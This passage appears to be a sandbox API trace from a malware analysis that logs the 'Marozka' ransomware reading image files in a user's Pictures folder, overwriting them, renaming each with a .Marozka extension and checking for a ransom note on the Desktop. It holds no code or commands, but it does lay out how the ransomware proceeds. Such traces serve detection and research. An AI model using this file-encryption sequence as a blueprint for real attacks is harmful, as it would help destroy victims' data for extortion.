0x2e0 [0054.960] GetFileType (hFile=0x2e0) returned 0x1 [0054.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0054.960] GetFileType (hFile=0x2e0) returned 0x1 [0054.960] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x185a [0054.960] ReadFile (in: hFile=0x2e0, lpBuffer=0x26d1954, nNumberOfBytesToRead=0x185a, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26d1954*, lpNumberOfBytesRead=0x5beabc*=0x185a, lpOverlapped=0x0) returned 1 [0054.960] CloseHandle (hObject=0x2e0) returned 1 [0054.988] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0054.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0054.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0054.988] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", lpFilePart=0x0) returned 0x2e [0054.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0054.988] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-llukbcu3khxbqxid.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0054.989] GetFileType (hFile=0x2e0) returned 0x1 [0054.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0054.989] GetFileType (hFile=0x2e0) returned 0x1 [0054.990] WriteFile (in: hFile=0x2e0, lpBuffer=0x2726120*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2726120*, lpNumberOfBytesWritten=0x5beab0*=0x1860, lpOverlapped=0x0) returned 1 [0054.992] CloseHandle (hObject=0x2e0) returned 1 [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", lpFilePart=0x0) returned 0x2e [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp.Marozka", lpFilePart=0x0) returned 0x36 [0054.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0054.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-llukbcu3khxbqxid.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a30f8e0, ftCreationTime.dwHighDateTime=0x1d4d2ce, ftLastAccessTime.dwLowDateTime=0xa1aec710, ftLastAccessTime.dwHighDateTime=0x1d4d482, ftLastWriteTime.dwLowDateTime=0xe381ecf9, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x1860)) returned 1 [0054.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0054.993] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-llukbcu3khxbqxid.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\-llukbcu3khxbqxid.bmp.marozka")) returned 1 [0054.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", lpFilePart=0x0) returned 0x23 [0054.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0054.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\1-do61.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0054.994] GetFileType (hFile=0x2e0) returned 0x1 [0054.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0054.994] GetFileType (hFile=0x2e0) returned 0x1 [0054.994] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x110ed [0054.994] ReadFile (in: hFile=0x2e0, lpBuffer=0x2727e84, nNumberOfBytesToRead=0x110ed, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2727e84*, lpNumberOfBytesRead=0x5beabc*=0x110ed, lpOverlapped=0x0) returned 1 [0054.994] CloseHandle (hObject=0x2e0) returned 1 [0055.017] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.017] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.018] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", lpFilePart=0x0) returned 0x23 [0055.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.018] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\1-do61.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.019] GetFileType (hFile=0x2e0) returned 0x1 [0055.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.019] GetFileType (hFile=0x2e0) returned 0x1 [0055.019] WriteFile (in: hFile=0x2e0, lpBuffer=0x27a7f54*, nNumberOfBytesToWrite=0x110f0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27a7f54*, lpNumberOfBytesWritten=0x5beab0*=0x110f0, lpOverlapped=0x0) returned 1 [0055.021] CloseHandle (hObject=0x2e0) returned 1 [0055.023] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp", lpFilePart=0x0) returned 0x23 [0055.023] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp.Marozka", lpFilePart=0x0) returned 0x2b [0055.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\1-do61.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37104970, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0xf40042a0, ftLastAccessTime.dwHighDateTime=0x1d4d5bd, ftLastWriteTime.dwLowDateTime=0xe386b20b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x110f0)) returned 1 [0055.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.023] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\1-do61.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\1-dO61.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\1-do61.bmp.marozka")) returned 1 [0055.024] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", lpFilePart=0x0) returned 0x2b [0055.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5vzd9q3lokpp6q.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.024] GetFileType (hFile=0x2e0) returned 0x1 [0055.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.024] GetFileType (hFile=0x2e0) returned 0x1 [0055.024] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xd39e [0055.024] ReadFile (in: hFile=0x2e0, lpBuffer=0x27b94dc, nNumberOfBytesToRead=0xd39e, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27b94dc*, lpNumberOfBytesRead=0x5beabc*=0xd39e, lpOverlapped=0x0) returned 1 [0055.024] CloseHandle (hObject=0x2e0) returned 1 [0055.061] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.061] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", lpFilePart=0x0) returned 0x2b [0055.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5vzd9q3lokpp6q.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.063] GetFileType (hFile=0x2e0) returned 0x1 [0055.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.063] GetFileType (hFile=0x2e0) returned 0x1 [0055.063] WriteFile (in: hFile=0x2e0, lpBuffer=0x282ddbc*, nNumberOfBytesToWrite=0xd3a0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x282ddbc*, lpNumberOfBytesWritten=0x5beab0*=0xd3a0, lpOverlapped=0x0) returned 1 [0055.064] CloseHandle (hObject=0x2e0) returned 1 [0055.066] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png", lpFilePart=0x0) returned 0x2b [0055.066] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png.Marozka", lpFilePart=0x0) returned 0x33 [0055.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.066] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5vzd9q3lokpp6q.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6fb320, ftCreationTime.dwHighDateTime=0x1d4cf55, ftLastAccessTime.dwLowDateTime=0x3f2cb3c0, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0xe38dd892, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xd3a0)) returned 1 [0055.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.066] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5vzd9q3lokpp6q.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\5vZD9q3loKPP6q.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\5vzd9q3lokpp6q.png.marozka")) returned 1 [0055.067] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", lpFilePart=0x0) returned 0x31 [0055.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\67m6eaw4fxjvek8q_6 o.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.067] GetFileType (hFile=0x2e0) returned 0x1 [0055.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.067] GetFileType (hFile=0x2e0) returned 0x1 [0055.067] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x4f35 [0055.067] ReadFile (in: hFile=0x2e0, lpBuffer=0x283b644, nNumberOfBytesToRead=0x4f35, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x283b644*, lpNumberOfBytesRead=0x5beabc*=0x4f35, lpOverlapped=0x0) returned 1 [0055.067] CloseHandle (hObject=0x2e0) returned 1 [0055.149] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.150] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", lpFilePart=0x0) returned 0x31 [0055.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\67m6eaw4fxjvek8q_6 o.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.151] GetFileType (hFile=0x2e0) returned 0x1 [0055.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.151] GetFileType (hFile=0x2e0) returned 0x1 [0055.151] WriteFile (in: hFile=0x2e0, lpBuffer=0x2698010*, nNumberOfBytesToWrite=0x4f40, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2698010*, lpNumberOfBytesWritten=0x5beab0*=0x4f40, lpOverlapped=0x0) returned 1 [0055.152] CloseHandle (hObject=0x2e0) returned 1 [0055.243] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp", lpFilePart=0x0) returned 0x31 [0055.243] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp.Marozka", lpFilePart=0x0) returned 0x39 [0055.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.243] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\67m6eaw4fxjvek8q_6 o.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6454250, ftCreationTime.dwHighDateTime=0x1d4d571, ftLastAccessTime.dwLowDateTime=0x445158a0, ftLastAccessTime.dwHighDateTime=0x1d4d33b, ftLastWriteTime.dwLowDateTime=0xe3a8fc08, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4f40)) returned 1 [0055.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.243] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\67m6eaw4fxjvek8q_6 o.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\67M6EAW4fXjvEk8q_6 O.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\67m6eaw4fxjvek8q_6 o.bmp.marozka")) returned 1 [0055.243] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", lpFilePart=0x0) returned 0x27 [0055.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.244] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ajutmio9ti.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.244] GetFileType (hFile=0x2e0) returned 0x1 [0055.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.244] GetFileType (hFile=0x2e0) returned 0x1 [0055.244] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xfc18 [0055.244] ReadFile (in: hFile=0x2e0, lpBuffer=0x269d44c, nNumberOfBytesToRead=0xfc18, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x269d44c*, lpNumberOfBytesRead=0x5beabc*=0xfc18, lpOverlapped=0x0) returned 1 [0055.244] CloseHandle (hObject=0x2e0) returned 1 [0055.269] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.270] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", lpFilePart=0x0) returned 0x27 [0055.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ajutmio9ti.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.271] GetFileType (hFile=0x2e0) returned 0x1 [0055.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.271] GetFileType (hFile=0x2e0) returned 0x1 [0055.271] WriteFile (in: hFile=0x2e0, lpBuffer=0x2719804*, nNumberOfBytesToWrite=0xfc20, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2719804*, lpNumberOfBytesWritten=0x5beab0*=0xfc20, lpOverlapped=0x0) returned 1 [0055.273] CloseHandle (hObject=0x2e0) returned 1 [0055.276] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg", lpFilePart=0x0) returned 0x27 [0055.276] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg.Marozka", lpFilePart=0x0) returned 0x2f [0055.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ajutmio9ti.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf18b04f0, ftCreationTime.dwHighDateTime=0x1d4c86c, ftLastAccessTime.dwLowDateTime=0x6a8ddc80, ftLastAccessTime.dwHighDateTime=0x1d4c839, ftLastWriteTime.dwLowDateTime=0xe3acd80b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xfc20)) returned 1 [0055.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.276] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ajutmio9ti.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\aJUtmio9ti.jpg.Marozka" (normalized: 